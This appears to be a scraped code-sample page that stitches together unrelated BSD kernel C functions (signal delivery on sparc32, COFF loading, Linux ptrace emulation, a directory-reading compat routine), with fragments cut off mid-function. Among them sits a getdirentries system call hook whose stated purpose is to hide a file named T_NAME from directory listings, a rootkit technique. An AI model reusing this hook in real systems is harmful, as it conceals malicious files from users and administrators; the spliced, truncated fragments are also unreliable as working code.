static void
netbsd32_sendsig_siginfo(const ksiginfo_t *ksi, const sigset_t *mask)
{
struct lwp *l = curlwp;
struct proc *p = l->l_proc;
struct sigacts *ps = p->p_sigacts;
int onstack;
int sig = ksi->ksi_signo;
ucontext32_t uc;
struct sparc32_sigframe_siginfo *fp;
netbsd32_intptr_t catcher;
struct trapframe64 *tf = l->l_md.md_tf;
struct rwindow32 *oldsp, *newsp;
int ucsz, error;
/* Need to attempt to zero extend this 32-bit pointer */
oldsp = (struct rwindow32*)(u_long)(u_int)tf->tf_out[6];
/* Do we need to jump onto the signal stack? */
onstack =
(l->l_sigstk.ss_flags & (SS_DISABLE | SS_ONSTACK)) == 0 &&
(SIGACTION(p, sig).sa_flags & SA_ONSTACK) != 0;
/* Allocate space for the signal handler context. */
if (onstack)
fp = (struct sparc32_sigframe_siginfo *)
((char *)l->l_sigstk.ss_sp +
l->l_sigstk.ss_size);
else
fp = (struct sparc32_sigframe_siginfo *)oldsp;
fp = (struct sparc32_sigframe_siginfo*)((u_long)(fp - 1) & ~7);
/*
* Build the signal context to be used by sigreturn.
*/
uc.uc_flags = _UC_SIGMASK |
((l->l_sigstk.ss_flags & SS_ONSTACK)
? _UC_SETSTACK : _UC_CLRSTACK);
uc.uc_sigmask = *mask;
uc.uc_link = (uint32_t)(uintptr_t)l->l_ctxlink;
memset(&uc.uc_stack, 0, sizeof(uc.uc_stack));
sendsig_reset(l, sig);
/*
* Now copy the stack contents out to user space.
* We need to make sure that when we start the signal handler,
* its %i6 (%fp), which is loaded from the newly allocated stack area,
* joins seamlessly with the frame it was in when the signal occurred,
* so that the debugger and _longjmp code can back up through it.
* Since we're calling the handler directly, allocate a full size
* C stack frame.
*/
mutex_exit(p->p_lock);
cpu_getmcontext32(l, &uc.uc_mcontext, &uc.uc_flags);
ucsz = (int)(intptr_t)&uc.__uc_pad - (int)(intptr_t)&uc;
newsp = (struct rwindow32*)((intptr_t)fp - sizeof(struct frame32));
error = (copyout(&ksi->ksi_info, &fp->sf_si, sizeof ksi->ksi_info) ||
copyout(&uc, &fp->sf_uc, ucsz) ||
suword(&newsp->rw_in[6], (intptr_t)oldsp));
mutex_enter(p->p_lock);
if (error) {
/*
* Process has trashed its stack; give it an illegal
* instruction to halt it in its tracks.
*/
sigexit(l, SIGILL);
/* NOTREACHED */
}
switch (ps->sa_sigdesc[sig].sd_vers) {
default:
/* Unsupported trampoline version; kill the process. */
sigexit(l, SIGILL);
case 2:
/*
* Arrange to continue execution at the user's handler.
* It needs a new stack pointer, a return address and
* three arguments: (signo, siginfo *, ucontext *).
*/
catcher = (intptr_t)SIGACTION(p, sig).sa_handler;
tf->tf_pc = catcher;
tf->tf_npc = catcher + 4;
tf->tf_out[0] = sig;
tf->tf_out[1] = (intptr_t)&fp->sf_si;
tf->tf_out[2] = (intptr_t)&fp->sf_uc;
tf->tf_out[6] = (intptr_t)newsp;
tf->tf_out[7] = (intptr_t)ps->sa_sigdesc[sig].sd_tramp - 8;
break;
}
/* Remember that we're now on the signal stack. */
if (onstack)
l->l_sigstk.ss_flags |= SS_ONSTACK;
}
/*
* getdirentries system call hook.
* Hides the file T_NAME.
*/
static int
getdirentries_hook(struct thread *td, void *syscall_args)
{
struct getdirentries_args /* {
int fd;
char *buf;
u_int count;
long *basep;
} */ *uap;
uap = (struct getdirentries_args *)syscall_args;
struct dirent *dp, *current;
unsigned int size, count;
/*
* Store the directory entries found in fd in buf, and record the
* number of bytes actually transferred.
*/
getdirentries(td, syscall_args);
size = td->td_retval[0];
/* Does fd actually contain any directory entries? */
if (size > 0) {
MALLOC(dp, struct dirent *, size, M_TEMP, M_NOWAIT);
copyin(uap->buf, dp, size);
current = dp;
count = size;
/*
* Iterate through the directory entries found in fd.
* Note: The last directory entry always has a record length
* of zero.
*/
while ((current->d_reclen != 0) && (count > 0)) {
count -= current->d_reclen;
/* Do we want to hide this file? */
if(strcmp((char *)&(current->d_name), T_NAME) == 0)
{
/*
* Copy every directory entry found after
* T_NAME over T_NAME, effectively cutting it
* out.
*/
if (count != 0)
bcopy((char *)current +
current->d_reclen, current,
count);
size -= current->d_reclen;
break;
}
/*
* Are there still more directory entries to
* look through?
*/
if (count != 0)
/* Advance to the next record. */
current = (struct dirent *)((char *)current +
current->d_reclen);
}
/*
* If T_NAME was found in fd, adjust the "return values" to
* hide it. If T_NAME wasn't found...don't worry 'bout it.
*/
td->td_retval[0] = size;
copyout(dp, uap->buf, size);
FREE(dp, M_TEMP);
}
return(0);
}
static int
load_coff_section(struct vmspace *vmspace, struct vnode *vp, vm_offset_t offset,
caddr_t vmaddr, size_t memsz, size_t filsz, vm_prot_t prot)
{
size_t map_len;
vm_offset_t map_offset;
vm_offset_t map_addr;
int error;
unsigned char *data_buf = 0;
size_t copy_len;
map_offset = trunc_page(offset);
map_addr = trunc_page((vm_offset_t)vmaddr);
if (memsz > filsz) {
/*
* We have the stupid situation that
* the section is longer than it is on file,
* which means it has zero-filled areas, and
* we have to work for it. Stupid iBCS!
*/
map_len = trunc_page(offset + filsz) - trunc_page(map_offset);
} else {
/*
* The only stuff we care about is on disk, and we
* don't care if we map in more than is really there.
*/
map_len = round_page(offset + filsz) - trunc_page(map_offset);
}
DPRINTF(("%s(%d): vm_mmap(&vmspace->vm_map, &0x%08jx, 0x%x, 0x%x, "
"VM_PROT_ALL, MAP_PRIVATE | MAP_FIXED, OBJT_VNODE, vp, 0x%x)\n",
__FILE__, __LINE__, (uintmax_t)map_addr, map_len, prot,
map_offset));
if ((error = vm_mmap(&vmspace->vm_map,
&map_addr,
map_len,
prot,
VM_PROT_ALL,
MAP_PRIVATE | MAP_FIXED,
OBJT_VNODE,
vp,
map_offset)) != 0)
return error;
if (memsz == filsz) {
/* We're done! */
return 0;
}
/*
* Now we have screwball stuff, to accomodate stupid COFF.
* We have to map the remaining bit of the file into the kernel's
* memory map, allocate some anonymous memory, copy that last
* bit into it, and then we're done. *sigh*
* For clean-up reasons, we actally map in the file last.
*/
copy_len = (offset + filsz) - trunc_page(offset + filsz);
map_addr = trunc_page((vm_offset_t)vmaddr + filsz);
map_len = round_page((vm_offset_t)vmaddr + memsz) - map_addr;
DPRINTF(("%s(%d): vm_map_find(&vmspace->vm_map, NULL, 0, &0x%08jx,0x%x, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0)\n", __FILE__, __LINE__, (uintmax_t)map_addr, map_len));
if (map_len != 0) {
error = vm_map_find(&vmspace->vm_map, NULL, 0, &map_addr,
map_len, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0);
if (error)
return (vm_mmap_to_errno(error));
}
if ((error = vm_mmap(exec_map,
(vm_offset_t *) &data_buf,
PAGE_SIZE,
VM_PROT_READ,
VM_PROT_READ,
0,
OBJT_VNODE,
vp,
trunc_page(offset + filsz))) != 0)
return error;
error = copyout(data_buf, (caddr_t) map_addr, copy_len);
if (vm_map_remove(exec_map,
(vm_offset_t) data_buf,
(vm_offset_t) data_buf + PAGE_SIZE))
panic("load_coff_section vm_map_remove failed");
return error;
}
int
linux_ptrace(struct thread *td, struct linux_ptrace_args *uap)
{
union {
struct linux_pt_reg reg;
struct linux_pt_fpreg fpreg;
struct linux_pt_fpxreg fpxreg;
} r;
union {
struct reg bsd_reg;
struct fpreg bsd_fpreg;
struct dbreg bsd_dbreg;
} u;
void *addr;
pid_t pid;
int error, req;
error = 0;
/* by default, just copy data intact */
req = uap->req;
pid = (pid_t)uap->pid;
addr = (void *)uap->addr;
switch (req) {
case PTRACE_TRACEME:
case PTRACE_POKETEXT:
case PTRACE_POKEDATA:
case PTRACE_KILL:
error = kern_ptrace(td, req, pid, addr, uap->data);
break;
case PTRACE_PEEKTEXT:
case PTRACE_PEEKDATA: {
/* need to preserve return value */
int rval = td->td_retval[0];
error = kern_ptrace(td, req, pid, addr, 0);
if (error == 0)
error = copyout(td->td_retval, (void *)uap->data,
sizeof(l_int));
td->td_retval[0] = rval;
break;
}
case PTRACE_DETACH:
error = kern_ptrace(td, PT_DETACH, pid, (void *)1,
map_signum(uap->data));
break;
case PTRACE_SINGLESTEP:
case PTRACE_CONT:
error = kern_ptrace(td, req, pid, (void *)1,
map_signum(uap->data));
break;
case PTRACE_ATTACH:
error = kern_ptrace(td, PT_ATTACH, pid, addr, uap->data);
break;
case PTRACE_GETREGS:
/* Linux is using data where FreeBSD is using addr */
error = kern_ptrace(td, PT_GETREGS, pid, &u.bsd_reg, 0);
if (error == 0) {
map_regs_to_linux(&u.bsd_reg, &r.reg);
error = copyout(&r.reg, (void *)uap->data,
sizeof(r.reg));
}
break;
case PTRACE_SETREGS:
/* Linux is using data where FreeBSD is using addr */
error = copyin((void *)uap->data, &r.reg, sizeof(r.reg));
if (error == 0) {
map_regs_from_linux(&u.bsd_reg, &r.reg);
error = kern_ptrace(td, PT_SETREGS, pid, &u.bsd_reg, 0);
}
break;
case PTRACE_GETFPREGS:
/* Linux is using data where FreeBSD is using addr */
error = kern_ptrace(td, PT_GETFPREGS, pid, &u.bsd_fpreg, 0);
if (error == 0) {
map_fpregs_to_linux(&u.bsd_fpreg, &r.fpreg);
error = copyout(&r.fpreg, (void *)uap->data,
sizeof(r.fpreg));
}
break;
case PTRACE_SETFPREGS:
/* Linux is using data where FreeBSD is using addr */
error = copyin((void *)uap->data, &r.fpreg, sizeof(r.fpreg));
if (error == 0) {
map_fpregs_from_linux(&u.bsd_fpreg, &r.fpreg);
error = kern_ptrace(td, PT_SETFPREGS, pid,
&u.bsd_fpreg, 0);
}
break;
case PTRACE_SETFPXREGS:
error = copyin((void *)uap->data, &r.fpxreg, sizeof(r.fpxreg));
if (error)
break;
/* FALL THROUGH */
case PTRACE_GETFPXREGS: {
struct proc *p;
struct thread *td2;
if (sizeof(struct linux_pt_fpxreg) != sizeof(struct savexmm)) {
static int once = 0;
//.........这里部分代码省略.........
//.........这里部分代码省略.........
VOP_UNLOCK(vp);
if (error)
goto out1;
loff = fp->f_offset;
nbytes = SCARG(uap, count);
buflen = min(MAXBSIZE, nbytes);
if (buflen < va.va_blocksize)
buflen = va.va_blocksize;
tbuf = malloc(buflen, M_TEMP, M_WAITOK);
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
off = fp->f_offset;
again:
aiov.iov_base = tbuf;
aiov.iov_len = buflen;
auio.uio_iov = &aiov;
auio.uio_iovcnt = 1;
auio.uio_rw = UIO_READ;
auio.uio_resid = buflen;
auio.uio_offset = off;
UIO_SETUP_SYSSPACE(&auio);
/*
* First we read into the malloc'ed buffer, then
* we massage it into user space, one record at a time.
*/
error = VOP_READDIR(vp, &auio, fp->f_cred, &eofflag, &cookiebuf,
&ncookies);
if (error)
goto out;
inp = (char *)tbuf;
outp = SCARG(uap, buf);
resid = nbytes;
if ((len = buflen - auio.uio_resid) == 0)
goto eof;
for (cookie = cookiebuf; len > 0; len -= reclen) {
bdp = (struct dirent *)inp;
reclen = bdp->d_reclen;
if (reclen & 3)
panic(__func__);
if (bdp->d_fileno == 0) {
inp += reclen; /* it is a hole; squish it out */
if (cookie)
off = *cookie++;
else
off += reclen;
continue;
}
old_reclen = _DIRENT_RECLEN(&idb, bdp->d_namlen);
if (reclen > len || resid < old_reclen) {
/* entry too big for buffer, so just stop */
outp++;
break;
}
/*
* Massage in place to make a Dirent12-shaped dirent (otherwise
* we have to worry about touching user memory outside of
* the copyout() call).
*/
idb.d_fileno = (uint32_t)bdp->d_fileno;
idb.d_reclen = (uint16_t)old_reclen;
idb.d_namlen = (uint16_t)bdp->d_namlen;
strcpy(idb.d_name, bdp->d_name);
if ((error = copyout(&idb, outp, old_reclen)))
goto out;
/* advance past this real entry */
inp += reclen;
if (cookie)
off = *cookie++; /* each entry points to itself */
else
off += reclen;
/* advance output past Dirent12-shaped entry */
outp += old_reclen;
resid -= old_reclen;
}
/* if we squished out the whole block, try again */
if (outp == SCARG(uap, buf)) {
if (cookiebuf)
free(cookiebuf, M_TEMP);
cookiebuf = NULL;
goto again;
}
fp->f_offset = off; /* update the vnode offset */
eof:
*retval = nbytes - resid;
out:
VOP_UNLOCK(vp);
if (cookiebuf)
free(cookiebuf, M_TEMP);
free(tbuf, M_TEMP);
out1:
fd_putfile(SCARG(uap, fd));
if (error)
return error;
return copyout(&loff, SCARG(uap, basep), sizeof(long));
}
请发表评论